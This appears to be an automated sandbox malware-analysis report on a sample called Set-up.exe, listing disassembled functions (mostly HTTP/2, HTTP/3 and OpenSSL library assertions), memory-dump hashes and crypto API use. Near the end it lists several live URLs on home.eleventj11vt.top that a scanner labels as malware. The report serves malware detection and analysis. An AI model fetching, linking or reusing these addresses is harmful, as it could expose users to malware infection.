Opcode Fuzzy Hash: feaf60d2dfdbb2ec85a56aa7e405b51ceca81cf687d30f6e94c4ab5f7cd3e5e7
Instruction Fuzzy Hash: 47414875A087068FC704CF19D490A2AB7E1FF88705F24D92DE99AD7361E730E859CB82

Function 00E645C0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E,?,?,?,?,?,?,?), ref: 00E6468C

Strings

tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS, xrefs: 00E64687
nghttp3_conn.c, xrefs: 00E64682

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _assert
String ID: nghttp3_conn.c$tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS
API String ID: 1222420520-4133914617
Opcode ID: e7f4bc6a79e7bdf6582ed1739ef57e5d0d991c44b6b2d367368bb38ee8a6f8e3
Instruction ID: 838f2e455326625f857aa0ce3f16dd4de9f566fcd0a40d58e443d9fd29971112
Opcode Fuzzy Hash: e7f4bc6a79e7bdf6582ed1739ef57e5d0d991c44b6b2d367368bb38ee8a6f8e3
Instruction Fuzzy Hash: 8231F4B16406016BD210DE39FC85EAB77DCEF863A9F040629F958E3282E731E914C7A1

Function 00E64400 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E), ref: 00E644B7

Strings

tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS, xrefs: 00E644B2
nghttp3_conn.c, xrefs: 00E644AD

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _assert
String ID: nghttp3_conn.c$tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS
API String ID: 1222420520-4133914617
Opcode ID: c09c334e133587309e1a5c9f447264ae462e2422b9cd4df21b57c5f7cea83c6e
Instruction ID: de0dd032300af85b50c28b508408bf9d8c595d4edce7a86c9c59e752f432e6e0
Opcode Fuzzy Hash: c09c334e133587309e1a5c9f447264ae462e2422b9cd4df21b57c5f7cea83c6e
Instruction Fuzzy Hash: 662104B22407116FEB105F65EC06F5B37DE9F84399F040428F928D62A3FB36D8148761

Function 0113A0C0 Relevance: 5.3, APIs: 4, Instructions: 327COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 0113A161
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 0113A2D1
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 0113A3EC
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 0113A499

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 3ab0a88c92259182a46f2dfa1378a0a9d76910452a13f486132d44d05287317f
Instruction ID: bf2386df4510369126f386c0067d4521bed904d4323f84488ec72fa6d45e3122
Opcode Fuzzy Hash: 3ab0a88c92259182a46f2dfa1378a0a9d76910452a13f486132d44d05287317f
Instruction Fuzzy Hash: 30C18C716042109FCB08DF2CD888A6A7BA5BFC8314F09456DE999CB35AD771EC50CB95

Function 00E66140 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(i < len || offset == 0,nghttp3_stream.c,00000371,00000000,00E3D7A7,?,?,00E3D7A7), ref: 00E661CF

Strings

nghttp3_stream.c, xrefs: 00E661C5
i < len || offset == 0, xrefs: 00E661CA

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _assert
String ID: i < len || offset == 0$nghttp3_stream.c
API String ID: 1222420520-1528673747
Opcode ID: 8e9e20b483014170253181e45c6e680125893a298301b5ce19ae1044bf1547b4
Instruction ID: 4e25f2242c680dc933376bd0001276b9b09189be047d3397ae246f85ae9d1e60
Opcode Fuzzy Hash: 8e9e20b483014170253181e45c6e680125893a298301b5ce19ae1044bf1547b4
Instruction Fuzzy Hash: 7B11C1B56453048FD300EF29D888FAAB7E4FF89364F0904BDE98957363DA306945CB92

Function 00E68700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((blklen & 0xfu) == 0,nghttp3_balloc.c,00000022,00E688D3,00000010,?,?,00000000,00E69AE3,00E6ACDD,-00000010,?,?,?,00000000,?), ref: 00E6873C

Strings

nghttp3_balloc.c, xrefs: 00E68732
(blklen & 0xfu) == 0, xrefs: 00E68737

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _assert
String ID: (blklen & 0xfu) == 0$nghttp3_balloc.c
API String ID: 1222420520-1502420682
Opcode ID: 9241844ed8019e15dacde71c5031b6232cd4f06e7da5f60dad38beb0601e193d
Instruction ID: 0cd62d1b2cc68cd297f9b1c85282956739ff2c941b44e7074324ec0a9d8277b2
Opcode Fuzzy Hash: 9241844ed8019e15dacde71c5031b6232cd4f06e7da5f60dad38beb0601e193d
Instruction Fuzzy Hash: D21188B96893505FC3219F14EC05B56BFB1AF52B58F19859DE848EB353D6309C04C792

Function 00DEC1D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28stringCOMMON

Download Yara Rule

APIs

strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,\/@), ref: 00DEC1E5
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00DEC1F4

Strings

\/@, xrefs: 00DEC1DF

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: strlenstrpbrk
String ID: \/@
API String ID: 3089284949-4263999291
Opcode ID: 9fc307c8bc46fb82960fe37dd858cba3ebd100d0ad2a9b2dff89379c5eed7b42
Instruction ID: cb5019ddd436611477b8e227e92e8832db01a866a9d4a54a05fe3325d5fdbc40
Opcode Fuzzy Hash: 9fc307c8bc46fb82960fe37dd858cba3ebd100d0ad2a9b2dff89379c5eed7b42
Instruction Fuzzy Hash: F1E0CDD3A141511ADF3630FDBC02BBF635587D1D65F1D027BE594D2304F230884252A6

Function 00E5A5A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(rcbuf->ref > 0,nghttp2_rcbuf.c,00000058,00E55E1F,?), ref: 00E5A5D6

Strings

nghttp2_rcbuf.c, xrefs: 00E5A5CC
rcbuf->ref > 0, xrefs: 00E5A5D1

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _assert
String ID: nghttp2_rcbuf.c$rcbuf->ref > 0
API String ID: 1222420520-4045439697
Opcode ID: af9f3d96d9483b715885e6853b8cb93e7c6105e21f92905111463656a80b38f5
Instruction ID: 976c5cee7d66d7186d231b98df5ef126bb68b13d48e19f149190f834a3adfdc8
Opcode Fuzzy Hash: af9f3d96d9483b715885e6853b8cb93e7c6105e21f92905111463656a80b38f5
Instruction Fuzzy Hash: CFF037342002009FCA148F04D955D257762BF44B1BB48D69CFD19573E2D731DC06DB02

Function 00E60300 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(rcbuf->ref > 0,nghttp3_rcbuf.c,0000005E,00E70B2D,5308C483,00000000,00E64D9F,?,00E60EC8), ref: 00E60333

Strings

nghttp3_rcbuf.c, xrefs: 00E60329
rcbuf->ref > 0, xrefs: 00E6032E

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _assert
String ID: nghttp3_rcbuf.c$rcbuf->ref > 0
API String ID: 1222420520-1879435254
Opcode ID: 60b477c2c57ee2361d79bd41caae101940734bb1727c29a62d0a62c32aa5ac77
Instruction ID: 6a6427d160ffc4e38575b7d115cabd399b94f17df65cfc6e0573750a0ae0fe0b
Opcode Fuzzy Hash: 60b477c2c57ee2361d79bd41caae101940734bb1727c29a62d0a62c32aa5ac77
Instruction Fuzzy Hash: EDE03034680604DFCA149F14E949A2673A1AF4875BF98D19CF4099B3A1D731DC06DB00

Function 00F9A170 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

Part of subcall function 00F99F60: GetStdHandle.KERNEL32(000000F4), ref: 00F99F76
Part of subcall function 00F99F60: GetFileType.KERNEL32(00000000), ref: 00F99F83
Part of subcall function 00F99F60: WriteFile.KERNEL32(00000000,?,00000200,?,00000000), ref: 00F99FBB

raise.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000016,00F9D8B6,assertion failed: WITHIN_ARENA(ptr),crypto/mem_sec.c,000002E8,00000000,00000020,00F9DF70,?,?,?,?,?,?,?,00000000), ref: 00F9A18B
_exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000003,?,00F9D8B6,assertion failed: WITHIN_ARENA(ptr),crypto/mem_sec.c,000002E8,00000000,00000020,00F9DF70,?,?,?,?,?,?,?), ref: 00F9A195

Strings

%s:%d: OpenSSL internal error: %s, xrefs: 00F9A17C

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: File$HandleTypeWrite_exitraise
String ID: %s:%d: OpenSSL internal error: %s
API String ID: 2477291680-569889646
Opcode ID: f361ab19b198a9ee9d4a77dec67d2ffc59fc592c2ddabc9186bf70a516a64592
Instruction ID: 291cea36c7e4562e1d0d91600663ae8df05f9298de30dec430f1417b660786e0
Opcode Fuzzy Hash: f361ab19b198a9ee9d4a77dec67d2ffc59fc592c2ddabc9186bf70a516a64592
Instruction Fuzzy Hash: 46C01272D45346ABEF067FD04C02A2EB575AF75B18F081C1CB294100A5D7A39524B617

Function 00E048C0 Relevance: 5.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,000000FF,00000000,00000000), ref: 00E048DC
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E048EB
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 00E04905
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E04914

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: ByteCharMultiWide$freemalloc
String ID:
API String ID: 2605342592-0
Opcode ID: 774e13402cb46abc637e13c6152c58ebdcdeb91f17cf979dba62e90042024fcb
Instruction ID: ca5ac9a55410c3cbbc7d33385b01e53cb939ee844633b39d519b523b1ad9d418
Opcode Fuzzy Hash: 774e13402cb46abc637e13c6152c58ebdcdeb91f17cf979dba62e90042024fcb
Instruction Fuzzy Hash: B1F0B4E2B8521737F63025F26D01F3B358CDB91BB9F580234BA10EA2E5E590DD004271

Function 01144230 Relevance: 5.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00DCF9BB,00000000,00DD5F07,?,?,00DCF9BB,?), ref: 01144266
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00DCF9BB,00000000,00DD5F07,?,?,00DCF9BB,?), ref: 0114427A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00DCF9BB,00000000,00DD5F07,?,?,00DCF9BB,?), ref: 01144285
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00DCF9BB,00000000,00DD5F07,?,?,00DCF9BB,?), ref: 01144290

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 96772b3ca8bfee48a04f74e783dcf7adfcaa43e9618a1240afc02e1645537087
Instruction ID: 8992d2bd6c9326b03e7b11064ebf758ef00a9374da1492edc171815dfaa6aebb
Opcode Fuzzy Hash: 96772b3ca8bfee48a04f74e783dcf7adfcaa43e9618a1240afc02e1645537087
Instruction Fuzzy Hash: E701F976A011118FFB28AF9CF440E0BB7D4AFA0B64F0A8439D4898B221D330EC448B81

Source: http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435	Avira URL Cloud: Label: malware
Source: http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435http://home.eleventj11vt.top/olN	Avira URL Cloud: Label: malware
Source: http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435?argument=0	Avira URL Cloud: Label: malware
Source: http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435se	Avira URL Cloud: Label: malware
Source: http://home.eleventj11vt.top/olN	Avira URL Cloud: Label: malware
Source: http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435963	Avira URL Cloud: Label: malware
Source: http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdR435	Avira URL Cloud: Label: malware
Source: http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435?argument=0s	Avira URL Cloud: Label: malware

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01268E70 GetVersion,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,GetLastError,__acrt_iob_func,_time32,GetLastError,__acrt_iob_func,	0_2_01268E70
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01148E90 Sleep,_open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,	0_2_01148E90
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00DD6080 memset,BCryptGenRandom,	0_2_00DD6080
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00E48EA0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptReleaseContext,	0_2_00E48EA0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00FFF6E0 wcscmp,CryptAcquireContextW,CryptGetUserKey,GetLastError,GetLastError,CryptReleaseContext,	0_2_00FFF6E0

